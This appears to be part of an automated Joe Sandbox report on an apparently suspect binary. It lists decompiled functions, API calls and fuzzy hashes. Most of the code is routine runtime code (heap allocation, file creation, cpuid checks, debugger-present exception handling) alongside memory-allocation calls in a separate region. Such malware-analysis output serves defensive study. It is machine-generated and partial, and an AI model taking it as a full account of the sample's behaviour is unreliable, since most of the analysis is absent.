                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004085F7 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 483 4085f7-408602 484 408610-408616 483->484 485 408604-40860e 483->485 487 408618-408619 484->487 488 40862f-408640 RtlAllocateHeap 484->488 485->484 486 408644-40864f call 407b2a 485->486 492 408651-408653 486->492 487->488 489 408642 488->489 490 40861b-408622 call 405c28 488->490 489->492 490->486 496 408624-40862d call 40b132 490->496 496->486 496->488
                                                                                              C-Code - Quality: 100%
                                                                                              			E004085F7(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x41931c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00405C28();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00407B2A())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0040B132(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                                                                                              0x004085fd
                                                                                              0x00408602
                                                                                              0x00408610
                                                                                              0x00408610
                                                                                              0x00408616
                                                                                              0x00408618
                                                                                              0x00408618
                                                                                              0x0040862f
                                                                                              0x00408638
                                                                                              0x00408640
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408620
                                                                                              0x00408622
                                                                                              0x00408644
                                                                                              0x00408649
                                                                                              0x0040864f
                                                                                              0x00000000
                                                                                              0x0040864f
                                                                                              0x00408625
                                                                                              0x0040862b
                                                                                              0x0040862d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040862d
                                                                                              0x00000000
                                                                                              0x0040862f
                                                                                              0x00408608
                                                                                              0x0040860e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,00401043,?,?,00406DCE,00000001,00000364,?,00000007,000000FF,?,00407B2F,00404734,00416638,00000010,004047E5), ref: 00408638
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: a829b3f0b1d2679323a47c5a03570c8b7e914778c728e45da5a14fba09613a7f
                                                                                              • Instruction ID: 8af4c84628817049adbbbf946348dce7c886d7d31342ed24d579084d3735eb4b
                                                                                              • Opcode Fuzzy Hash: a829b3f0b1d2679323a47c5a03570c8b7e914778c728e45da5a14fba09613a7f
                                                                                              • Instruction Fuzzy Hash: DEF0B43190562466DF216A269E01B5B37589B41760F16883FEC84B62D1DF3AE80286ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A40838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00A407DA: GetSystemInfo.KERNELBASE(?), ref: 00A407F7
                                                                                              • VirtualAllocExNuma.KERNELBASE(00000000), ref: 00A4089D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315515134.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_a40000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocInfoNumaSystemVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 449148690-0
                                                                                              • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                              • Instruction ID: 017d7d373007abc6772c103e073b7935412bde80e3a8843261d5a7f2119b49eb
                                                                                              • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                              • Instruction Fuzzy Hash: A4F0F478D44308BEEB107BF04B0BF6D7A789FC0301F1045657740B6183DA785600BAA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C030 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 532 40c030-40c054 CreateFileW
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040C030(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                                                                                              0x0040c04d
                                                                                              0x0040c054

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,00000000,?,0040C420,?,?,00000000,?,0040C420,?,0000000C), ref: 0040C04D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: e71ee0a6b994b30baac54f39ebd469391bec9d7ee12b77647d486742536d2a98
                                                                                              • Instruction ID: d3d790fabce8b5b259a84b2d8b92183d37b35fe99d3823a766239035a33429a8
                                                                                              • Opcode Fuzzy Hash: e71ee0a6b994b30baac54f39ebd469391bec9d7ee12b77647d486742536d2a98
                                                                                              • Instruction Fuzzy Hash: C2D06C3201014DBFDF029F84DD06EDA3FAAFB4C754F018010BA1896020C732E861AB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00A40777
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315515134.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_a40000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                              • Instruction ID: e09852a88b9254d9fa2694572a09eb0779932e23924998df445ca1170ebb6448
                                                                                              • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                              • Instruction Fuzzy Hash: 41110674D00218AFDB00EBA8CD49BAEBBB4EB44305F2084A5EA55B7291D2755A44AF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 0040632B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 81%
                                                                                              			E0040632B(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x418014; // 0xcd317e6f
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401918(_t41);
					_pop(_t61);
				}
				E004020B0(_t66,  &_v804, 0, 0x50);
				E004020B0(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0x0
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x41663c
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0xfffffffe
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x0
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xfffffffe
				_v800 =  *_t32;
				_t34 =  &_v0; // 0x0
				_v792 =  *_t34;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x416310
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0xffffffd0
					_push( *_t38);
					_t57 = E00401918(_t57);
				}
				_t39 =  &_v8; // 0x0
				return E00401BA5(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
			}






































                                                                                              0x0040632b
                                                                                              0x0040632b
                                                                                              0x0040632b
                                                                                              0x00406336
                                                                                              0x0040633b
                                                                                              0x0040633d
                                                                                              0x00406345
                                                                                              0x00406347
                                                                                              0x0040634a
                                                                                              0x0040634f
                                                                                              0x0040634f
                                                                                              0x0040635b
                                                                                              0x0040636e
                                                                                              0x0040637c
                                                                                              0x00406382
                                                                                              0x00406388
                                                                                              0x0040638e
                                                                                              0x00406394
                                                                                              0x0040639a
                                                                                              0x004063a0
                                                                                              0x004063a6
                                                                                              0x004063ac
                                                                                              0x004063b2
                                                                                              0x004063b9
                                                                                              0x004063c0
                                                                                              0x004063c7
                                                                                              0x004063ce
                                                                                              0x004063d5
                                                                                              0x004063dc
                                                                                              0x004063dd
                                                                                              0x004063e3
                                                                                              0x004063e6
                                                                                              0x004063ec
                                                                                              0x004063ec
                                                                                              0x004063ef
                                                                                              0x004063f5
                                                                                              0x004063ff
                                                                                              0x00406402
                                                                                              0x00406408
                                                                                              0x0040640b
                                                                                              0x00406411
                                                                                              0x00406414
                                                                                              0x0040641a
                                                                                              0x0040641d
                                                                                              0x0040642b
                                                                                              0x0040642d
                                                                                              0x00406433
                                                                                              0x00406442
                                                                                              0x0040644e
                                                                                              0x0040644e
                                                                                              0x00406451
                                                                                              0x00406456
                                                                                              0x00406457
                                                                                              0x00406463

                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00406423
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040642D
                                                                                              • UnhandledExceptionFilter.KERNEL32(00416310,?,?,?,?,?,?), ref: 0040643A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID: 8fA
                                                                                              • API String ID: 3906539128-3880112157
                                                                                              • Opcode ID: a764b019344f1d1fd66578ccd4e46f7fedd77cfe9906eeae70ee46ebfaea1858
                                                                                              • Instruction ID: 20d098312afeea556d0a725c6e47d42f7c17aa1b68c0c82770c69aebac3916f5
                                                                                              • Opcode Fuzzy Hash: a764b019344f1d1fd66578ccd4e46f7fedd77cfe9906eeae70ee46ebfaea1858
                                                                                              • Instruction Fuzzy Hash: 2631D47490121C9BCB21DF64D988BCDBBB8BF08310F5041EAE50CA72A1E7749B858F49
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401754 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E00401754(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00401918(_t34);
				 *_t60 = 0x2cc;
				_v632 = E004020B0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E004020B0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00401918(_t49);
				}
				return _t49;
			}


































                                                                                              0x00401754
                                                                                              0x00401754
                                                                                              0x00401754
                                                                                              0x00401768
                                                                                              0x0040176a
                                                                                              0x0040176d
                                                                                              0x0040176d
                                                                                              0x00401771
                                                                                              0x00401776
                                                                                              0x0040178e
                                                                                              0x00401794
                                                                                              0x0040179a
                                                                                              0x004017a0
                                                                                              0x004017a6
                                                                                              0x004017ac
                                                                                              0x004017b2
                                                                                              0x004017b9
                                                                                              0x004017c0
                                                                                              0x004017c7
                                                                                              0x004017ce
                                                                                              0x004017d5
                                                                                              0x004017dc
                                                                                              0x004017dd
                                                                                              0x004017e6
                                                                                              0x004017ec
                                                                                              0x004017ef
                                                                                              0x004017f5
                                                                                              0x00401804
                                                                                              0x00401810
                                                                                              0x0040181b
                                                                                              0x00401822
                                                                                              0x00401829
                                                                                              0x00401834
                                                                                              0x0040183c
                                                                                              0x00401845
                                                                                              0x00401847
                                                                                              0x0040184a
                                                                                              0x0040184c
                                                                                              0x00401856
                                                                                              0x0040185e
                                                                                              0x00401864
                                                                                              0x00000000
                                                                                              0x0040186b
                                                                                              0x0040186e

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401760
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040182C
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040184C
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00401856
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 5fad4d11d08e64331ba717673262f1665b0be520d3b8741475a26910711bd49a
                                                                                              • Instruction ID: e4827e7739089fe42aecd6bfa09fa5013c0f62c45cbd51bb6245c4bc74d11462
                                                                                              • Opcode Fuzzy Hash: 5fad4d11d08e64331ba717673262f1665b0be520d3b8741475a26910711bd49a
                                                                                              • Instruction Fuzzy Hash: 71312B75D0131C9BDB21EF65D949BCDBBB8AF08304F1041AAE50DA72A0EB755B84CF49
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004019C5 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 88%
                                                                                              			E004019C5(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x41896c =  *0x41896c & 0x00000000;
				 *0x418010 =  *0x418010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x418970; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x418970 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x418010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x41896c = 1;
					 *0x418010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x41896c = 2;
						 *0x418010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x418010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x41896c = 3;
								 *0x418010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x41896c = 5;
									 *0x418010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x418010 =  *0x418010 | 0x00000040;
										 *0x41896c = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x418970; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x418970 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























                                                                                              0x004019c5
                                                                                              0x004019c8
                                                                                              0x004019d2
                                                                                              0x004019e3
                                                                                              0x00401b95
                                                                                              0x00401b98
                                                                                              0x00401b98
                                                                                              0x004019e9
                                                                                              0x004019ef
                                                                                              0x004019f4
                                                                                              0x004019f8
                                                                                              0x004019fc
                                                                                              0x004019fe
                                                                                              0x00401a00
                                                                                              0x00401a03
                                                                                              0x00401a08
                                                                                              0x00401a11
                                                                                              0x00401a22
                                                                                              0x00401a2d
                                                                                              0x00401a33
                                                                                              0x00401a34
                                                                                              0x00401a3a
                                                                                              0x00401a3d
                                                                                              0x00401a47
                                                                                              0x00401a4a
                                                                                              0x00401a4d
                                                                                              0x00401a50
                                                                                              0x00401a95
                                                                                              0x00401a95
                                                                                              0x00401a9b
                                                                                              0x00401a9b
                                                                                              0x00401aa0
                                                                                              0x00401aa1
                                                                                              0x00401aa7
                                                                                              0x00401ad9
                                                                                              0x00401aa9
                                                                                              0x00401aab
                                                                                              0x00401aac
                                                                                              0x00401ab2
                                                                                              0x00401ab5
                                                                                              0x00401ab7
                                                                                              0x00401aba
                                                                                              0x00401abd
                                                                                              0x00401ac0
                                                                                              0x00401ac3
                                                                                              0x00401acc
                                                                                              0x00401ad1
                                                                                              0x00401ad1
                                                                                              0x00401acc
                                                                                              0x00401adc
                                                                                              0x00401ae1
                                                                                              0x00401ae4
                                                                                              0x00401aee
                                                                                              0x00401af9
                                                                                              0x00401aff
                                                                                              0x00401b02
                                                                                              0x00401b0c
                                                                                              0x00401b17
                                                                                              0x00401b23
                                                                                              0x00401b26
                                                                                              0x00401b29
                                                                                              0x00401b34
                                                                                              0x00401b39
                                                                                              0x00401b3b
                                                                                              0x00401b40
                                                                                              0x00401b43
                                                                                              0x00401b4d
                                                                                              0x00401b55
                                                                                              0x00401b5a
                                                                                              0x00401b64
                                                                                              0x00401b72
                                                                                              0x00401b85
                                                                                              0x00401b8c
                                                                                              0x00401b8c
                                                                                              0x00401b72
                                                                                              0x00401b55
                                                                                              0x00401b39
                                                                                              0x00401b17
                                                                                              0x00000000
                                                                                              0x00401b94
                                                                                              0x00401a55
                                                                                              0x00401a5f
                                                                                              0x00401a84
                                                                                              0x00401a8a
                                                                                              0x00401a8d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004019DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: d62d51e71b8fd3988c62711d29348ec01a66d0655dd7a116938e262c92d3be91
                                                                                              • Instruction ID: 949349235bad66e005b48913db928b8634da04dbacc2fbaddfa3ac57eccd98fe
                                                                                              • Opcode Fuzzy Hash: d62d51e71b8fd3988c62711d29348ec01a66d0655dd7a116938e262c92d3be91
                                                                                              • Instruction Fuzzy Hash: 445127B1A122098BDB24CF99D8857AABBF0FB48314F24C47AD411EB3A1D7789941CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B06F Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040B06F() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x41931c = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                              0x0040b06f
                                                                                              0x0040b077
                                                                                              0x0040b07f

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 8599e896052f466983a20288a6911b055cf0c841e04d0daf2cd952456e632460
                                                                                              • Instruction ID: 23b21949a131ac75feb7882fe7abb5f538297989a73c298ab51d6be0785d0276
                                                                                              • Opcode Fuzzy Hash: 8599e896052f466983a20288a6911b055cf0c841e04d0daf2cd952456e632460
                                                                                              • Instruction Fuzzy Hash: 49A02230E00208CF8B00CF32AE0838C3EF8BA0C2C0300C038E800C20B0EB308880CF08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4017B Relevance: .1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315515134.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_a40000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                              • Instruction ID: 9aa88617d775c6c7157b59907f6329542dad17881fe5e03742568175c362621f
                                                                                              • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                              • Instruction Fuzzy Hash: 4A11823A600119AFD710EF69C884DAEB7E9EF947A47048115FE55CB210E334ED81E794
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4013E Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315515134.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_a40000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
